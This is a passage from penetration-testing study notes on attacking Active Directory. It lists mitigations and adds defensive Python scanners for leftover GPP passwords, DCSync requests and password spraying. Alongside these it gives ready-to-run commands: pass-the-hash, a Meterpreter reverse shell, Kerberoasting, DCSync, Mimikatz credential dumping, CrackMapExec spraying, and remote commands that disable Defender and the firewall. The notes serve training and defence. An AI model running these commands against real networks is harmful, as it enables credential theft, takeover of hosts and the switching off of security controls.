  - Pass the Hash: take the last part of the hash line (the NT hash) from the hashdump: `crackmapexec smb <IP> -u <username> -H <NT hash> --local-auth`
- Pass Attacks Mitigation
  - Hard to completely prevent, but we can make it more difficult for an attacker.
  - Limit account re-use
    - Avoid re-using local admin passwords
    - Disable Guest and Administrator accounts
    - Limit who is a local administrator (least privilege)
  - Utilize strong passwords
    - The longer the better (>14 characters)
    - Avoid using common words
    - I like long sentences
  - Privilege Access Management (PAM)
    - Check out/in sensitive accounts when needed.
    - Automatically rotate passwords on check out and check in
    - Limits pass attacks as the hash/password is strong and constantly rotated.
**Token Impersonation Overview**
- Tokens: Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think cookies for computers.
- Types
  - Delegate: Created for logging into a machine or using Remote Desktop
  - Impersonate: "non-interactive", such as attaching a network drive or a domain logon script

**Token Impersonation with Incognito**
- `msfconsole`
- `use exploit/windows/smb/psexec`
- `set RHOSTS, SMBDomain, SMBPass and SMBUser`
- `show targets` : Choose Native Upload
- `set target 2`
- `set payload windows/x64/meterpreter/reverse_tcp`
- `set lhost eth0`
- `run`
- A Meterpreter session will be created. We can load incognito from the meterpreter shell.
- `load incognito`
- `help` - It will show the incognito commands
- `list_tokens -u` : List the tokens; we can impersonate the listed users.
- `impersonate_token marvel\\administrator`
- `shell`
- `whoami`

**Mitigation Strategies**
- Limit user/group token creation permissions
- Account tiering: a Domain Administrator should only log into the machines they need to access, which should only be domain controllers. If a domain administrator logs into a user computer or a server and that machine gets compromised, its token can be impersonated from the compromised machine.
- Local admin restriction: if users are not local admins on their computers, we cannot get a shell on that computer with their account, which prevents us from getting onto the computer and utilizing this kind of attack.

**Kerberos Overview**
- Kerberos is a network authentication protocol used in Windows Active Directory.
- In this process, clients connect and interact with the network authentication service: the client obtains tickets from the Key Distribution Center (KDC), and after obtaining the ticket from the KDC, a client may use the ticket in order to communicate with the Application Servers.
- Kerberos runs on Port 88 (UDP) by default.
- Some terms to be cleared up:
  - Client: A normal user who wants to access a service.
  - Key Distribution Center (KDC): The most important component, which plays the main role in the authentication process.
  - Application Server: Any application service, such as SQL
  - TGT (Ticket Granting Ticket): Ticket needed for requesting a TGS from the KDC; it is obtained from the KDC only.
  - TGS (Ticket Granting Service): Ticket needed for authenticating against a particular service; it is encrypted with the service account's hash.
  - SPN (Service Principal Name): An SPN is an identifier for each service instance; it is one of the key components in the process of authentication.

**Kerberoasting Attack**
- Kerberoasting is an attack where an attacker can steal the Kerberos TGS ticket, which is encrypted.
- The attacker can then attempt to crack it offline. Kerberos uses the NTLM hash of the service account in order to encrypt the KRB_TGS of that service.
- When a domain user sends a request for a TGS ticket to the KDC for any service that has a registered SPN, the KDC generates the KRB_TGS without checking the user's authorization against the requested service.
- Step 1 : Get SPNs, dump the hash
  - `python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <IP> -request`
- Step 2 : Crack that hash
  - `hashcat -m 13100 hash.txt wordlist.txt`
- AS-REP Roasting: There is an option for an account to have the property "Do not require Kerberos preauthentication" or UF_DONT_REQUIRE_PREAUTH set to true. AS-REP Roasting is an attack against Kerberos for these accounts. If such accounts exist we can perform the attack without a password.
  - `python3 GetNPUsers.py <domain>/<username> -dc-ip <IP> -request -no-pass`
  - If there are multiple users which need to be tried without a password, then:
  - `for i in $(cat users.txt); do python3 GetNPUsers.py htb.local/$i -dc-ip 10.129.129.128 -no-pass -request; done`

**Mitigation Strategies**
- Strong passwords
- Least privilege: Do not make your domain accounts or service accounts domain administrators.

**GPP / cPassword Attacks**
- Group Policy Preferences allowed admins to create policies using embedded credentials.
- These credentials were encrypted and placed in a "cPassword"
- The key was accidentally released
- Patched in MS14-025, but this doesn't prevent previous uses.
- Group Policies are stored in SYSVOL on the domain controller; any domain user can read the policy and therefore decrypt the stored passwords.
- The GPP cpassword is stored in the Groups.xml file
- Decrypt GPP: `gpp-decrypt <cpassword>`

**DC Sync Attack**
- A DC Sync Attack uses commands of the Active Directory Replication Service Remote Protocol (MS-DRSR) to pretend to be a domain controller (DC) in order to get user credentials from another DC.
- We need permission to actually replicate AD information. By default domain controllers have the permissions called `Replicating Directory Changes` and `Replicating Directory Changes All`. These two permissions are needed to perform a DC Sync attack.
- The most common way of getting those permissions is to abuse the Microsoft Exchange Windows Permissions group. Exchange is Microsoft's email server service and integrates with Active Directory. AD grants that group permission to modify permissions on the root of the domain. So if we get into that group we can abuse it to perform the attack.
- It means that the credential you are using for this attack should be in that group.
  - `python3 secretsdump.py htb.local/username:password@pc1.htb.local`
  - where pc1 is a machine name.
- Use the acquired hash to perform a pass the hash attack.

**Mimikatz Overview**
- [Mimikatz](https://github.com/gentilkiwi/mimikatz) is a tool used to view and steal credentials, generate Kerberos tickets, and leverage attacks.
- Dumps credentials stored in memory.
- Just a few attacks: Credential Dumping, Pass-the-Hash, Over-Pass-the-Hash, Pass-the-Ticket, Golden Ticket, Silver Ticket
- The different modules mimikatz uses are explained on its [wiki](https://github.com/gentilkiwi/mimikatz/wiki)

**Credential Dumping with Mimikatz**
- Download the binary onto the compromised machine.
- Open a CMD, navigate to the downloaded folder and execute the exe file: `.\mimikatz.exe`
- Enable the debug privilege: `privilege::debug`. Debug means that it allows us to debug a process that we wouldn't otherwise have access to, for example to dump information out of memory.
- Dump the logon passwords
  - `sekurlsa::logonpasswords`
- Dump the SAM hashes
  - `lsadump::sam`
- Dump the LSA
  - `lsadump::lsa /patch`

**SwissArmy CrackMapExec Intro**
- A post exploitation tool that helps automate assessing the security of large Active Directory networks
- Available protocols: ldap, mssql, smb, ssh, winrm
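Added example (not from these notes, nor from gpp-decrypt), returning to the GPP / cPassword section above: the cleanup after MS14-025 is to find and delete every Group Policy Preference item that still embeds a cpassword and to rotate the account it sets. This Python walks a SYSVOL copy (or a mounted `\\domain\SYSVOL` share) and reports every XML element carrying a non-empty `cpassword` attribute, which can live not only in Groups.xml but also in Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml. It does no decryption. The sample tree is written to a temp directory and its cpassword value is a placeholder, not a real encrypted password.

```python
"""Find Group Policy Preference XML files under SYSVOL that still carry cpassword.

Added example, not part of the notes. make_sample_sysvol() writes a constructed
tree with a placeholder cpassword so the scanner can be run offline."""
import os
import tempfile
import xml.etree.ElementTree as ET
from typing import List, Tuple

# GPP files that can embed credentials (any of them may carry cpassword).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}


def find_cpasswords(sysvol_root: str) -> List[Tuple[str, str, str]]:
    """Return (relative path, element tag, account name) for every element with a
    non-empty cpassword attribute under sysvol_root."""
    hits: List[Tuple[str, str, str]] = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            full = os.path.join(dirpath, fname)
            try:
                tree = ET.parse(full)
            except ET.ParseError:
                continue      # a real scan would report unparsable files separately
            for elem in tree.iter():
                if elem.get("cpassword"):
                    who = elem.get("userName") or elem.get("accountName") or elem.get("name") or "?"
                    hits.append((os.path.relpath(full, sysvol_root), elem.tag, who))
    return hits


# Constructed Groups.xml: one local user item with an embedded (placeholder) password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="localadmin" changed="2014-01-01 00:00:00">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="PLACEHOLDER-NOT-A-REAL-CPASSWORD" changeLogon="0" noChange="1"
      neverExpires="1" acctDisabled="0" userName="localadmin"/>
  </User>
</Groups>
"""

# Constructed Drives.xml without credentials, so the scanner has something to ignore.
SAMPLE_CLEAN_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives>
  <Drive name="H:">
    <Properties action="U" path="\\\\fs01\\home" label="Home" letter="H"/>
  </Drive>
</Drives>
"""


def make_sample_sysvol() -> str:
    """Write a tiny SYSVOL-like tree (constructed) and return its root."""
    root = tempfile.mkdtemp(prefix="sysvol-")
    gpo = os.path.join(root, "htb.local", "Policies", "{GPO-GUID-PLACEHOLDER}",
                       "Machine", "Preferences")
    for sub, name, body in (("Groups", "Groups.xml", SAMPLE_GROUPS_XML),
                            ("Drives", "Drives.xml", SAMPLE_CLEAN_XML)):
        os.makedirs(os.path.join(gpo, sub), exist_ok=True)
        with open(os.path.join(gpo, sub, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, tag, who in find_cpasswords(make_sample_sysvol()):
        print(f"{path}: <{tag}> sets a password for {who}")
```

Run it against the real share as any domain user to see what an attacker can see; each hit should be removed from the GPO and the account's password changed, since deleting the XML does not undo past exposure.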

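For the DC Sync section above, the detection side: a DCSync request is logged on the domain controller as Security event 4662 whose Properties list the replication extended rights, and only other domain controllers' machine accounts should ever ask for them. This is an added example, not part of the original notes; the three extended-right GUIDs are the real Active Directory control access right GUIDs, while the sample event records, account names and logon IDs are constructed.

```python
# Replication extended rights a DCSync request exercises (real AD control access
# right GUIDs, as they appear in the Properties field of Security event 4662).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

def flag_dcsync(events, dc_accounts):
    """Return one finding per 4662 event whose Properties name a replication right
    and whose subject is not an expected domain controller machine account."""
    expected = {a.upper() for a in dc_accounts}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        rights = [name for guid, name in REPL_RIGHTS.items() if guid in props]
        if not rights:
            continue  # ordinary directory access, not a replication request
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in expected:
            continue  # DC-to-DC replication is what these rights exist for
        findings.append({"subject": subject, "domain": ev.get("SubjectDomainName", ""),
                         "rights": rights, "logon_id": ev.get("SubjectLogonId", "")})
    return findings

# Constructed sample 4662 records (only the fields the rule needs). Properties
# is a newline-separated list of GUIDs, as the real event renders it.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "HTB",
     "SubjectLogonId": "0x3e7",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "HTB",
     "SubjectLogonId": "0x5a1c2",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "HTB",
     "SubjectLogonId": "0x5a1c2",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # plain user-object read
]
```

The same rights are what to look for when auditing who holds them on the domain root, which is how membership in groups like Exchange Windows Permissions ends up mattering.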
**CrackMapExec Password Policy Checkup**
- Before performing a brute-force attack using CrackMapExec, it is always handy to analyze the password policy first so that we do not lock users out of their accounts. It also helps with [generating passwords](https://github.com/nirajkharel/PasswordCracking/blob/main/README.md) as well.
- `crackmapexec smb IP --pass-pol -u '' -p ''`


**SwissArmy CrackMapExec Password Spraying**
- Spray credentials to an IP range
  - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --no-bruteforce`
  - It will also show if we have admin access; if we do, it prints the (Pwn3d!) message.
- Spray different user and password combinations
  - `crackmapexec smb 192.168.1.50-192.168.1.55 -u usernames.txt -p passwords.txt --no-bruteforce`
- Spray hashes to an IP range
  - `crackmapexec smb 192.168.1.50-192.168.1.55 -H hashes.txt --no-bruteforce`
- By default CrackMapExec exits after a successful login is found. Using the `--continue-on-success` flag will continue spraying even after a valid password is found.
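The two sections above make the point that a spray is tuned to stay under the lockout threshold from the password policy, so a per-user failure count never fires. The detection that does work counts distinct target accounts per source inside a sliding window. This is an added example, not part of the original notes; it takes 4625 logon-failure fields as tuples, and the timestamps, source IPs and usernames are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def detect_spray(failures, window_minutes=30, min_users=5):
    """failures: iterable of (timestamp, source_ip, target_user) taken from 4625
    logon failures. Returns {source_ip: sorted distinct usernames} for every source
    that failed against at least min_users different accounts inside any
    window_minutes-long sliding window. Counting distinct users rather than failures
    per user is what catches a spray that stays under the lockout threshold."""
    by_source = defaultdict(list)
    for ts, src, user in failures:
        by_source[src].append((ts, user.lower()))
    window = timedelta(minutes=window_minutes)
    alerts = {}
    for src, attempts in by_source.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1  # slide the window forward
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) >= min_users:
                alerts[src] = sorted({u for _, u in attempts})  # report every account touched
                break
    return alerts

def _t(hhmm):
    return datetime(2024, 1, 15, int(hhmm[:2]), int(hhmm[3:]))

# Constructed 4625 failures: 10.0.0.5 sprays one password across six accounts in
# nine minutes (one failure each, far below any lockout threshold); 10.0.0.9 is a
# single user mistyping a password; 10.0.0.7 touches six accounts but hours apart.
SAMPLE_FAILURES = [
    (_t("09:00"), "10.0.0.5", "alice"), (_t("09:02"), "10.0.0.5", "bob"),
    (_t("09:03"), "10.0.0.5", "carol"), (_t("09:05"), "10.0.0.5", "dave"),
    (_t("09:07"), "10.0.0.5", "erin"), (_t("09:09"), "10.0.0.5", "frank"),
    (_t("09:10"), "10.0.0.9", "alice"), (_t("09:11"), "10.0.0.9", "alice"),
    (_t("09:12"), "10.0.0.9", "alice"), (_t("09:13"), "10.0.0.9", "Alice"),
    (_t("08:00"), "10.0.0.7", "bob"), (_t("09:30"), "10.0.0.7", "carol"),
    (_t("11:00"), "10.0.0.7", "dave"), (_t("12:30"), "10.0.0.7", "erin"),
    (_t("14:00"), "10.0.0.7", "frank"), (_t("15:30"), "10.0.0.7", "gina"),
]
```

Widening the window (a day rather than half an hour) is how the slow spray from 10.0.0.7 would also surface, at the cost of more noise from shared hosts.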

**SwissArmy CrackMapExec ENUM 1**
- Use the smb module to enumerate shares
  - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --shares`
  - It will provide the share name, permissions and remarks.
  - We can follow up on the result with smbclient to access the shares.
- Sessions
  - Take a look at the sessions and see if there are any active sessions we have access to.
  - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --sessions`
- Enumerate disks
  - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --disks`
- Logged-on users
  - See if there are any logged-on users in the network.
  - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --loggedon-users`
  - If we are a local admin but not a domain admin, and the logged-on users are domain admins, we will be able to dump their hashes and perform a pass-the-hash attack to get a session.
- Get all users
  - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --users`

**SwissArmy CrackMapExec ENUM 2**
- Enumerate RIDs: a Relative Identifier (RID) is a variable-length number assigned to an object at creation that becomes part of the object's Security Identifier (SID), which uniquely identifies an account or group within a domain. The domain SID is the same across a domain, but the RID is different per object. Windows creates some RIDs by default in Active Directory, for example RID 501 for administrator, 502 for default and 503 for guest account.
  - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --rid-brute` It will also show which entries are groups, users and aliases.
- Enumerate password policy
  - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --pass-pol`

**SwissArmy CrackMapExec Command Execution**
- `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -x 'whoami'`
  - Where 192.168.1.54 is a host the account has local access to; `-x` runs a command line, `-X` runs a PowerShell script or command line.
- `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami'`
- Verify local admin access
  - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami /groups'`
  - If the account is a member of BUILTIN\Administrators, it has local admin access on the machine.
  - Local admin access means full control over the local computer.
- Get computer status: antivirus status, protections, real-time protection.
  - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'`
  - If we are a domain admin, we can disable such things.
- Disable monitoring
  - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableRealtimeMonitoring $true'`
- Disable antivirus
  - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableIOAVProtection $true'`
- Verify whether these are disabled
  - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'`
- View all firewall profiles (public, private)
  - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall show allprofiles'`
- If they are enabled, disable with
  - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall set allprofiles state off'`
- Enumerate directories
  - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'dir C:\Users\ippsec'`
- Read files
  - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'type C:\Users\ippsec\users.txt'`

### References
- [TCM Security - Heath Adams](https://academy.tcm-sec.com) (Most of the contents)
- [Top Five Ways I Got Domain Admin on Your Internal Network Before Lunch by Adam Toscher](https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
- [Practical Ethical Hacking by TCM Security](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)
- [Active Directory Pentesting - Red Team by I.T & Security](https://www.youtube.com/watch?v=gSpQMzINB6U&list=PLziMzyAZFGMf8rGjtpV6gYbx5hozUNeSZ)
- https://www.youtube.com/watch?v=ajOr4pcx6T0
- https://medium.com/@Shorty420/kerberoasting-9108477279cc
- https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
- https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
- https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/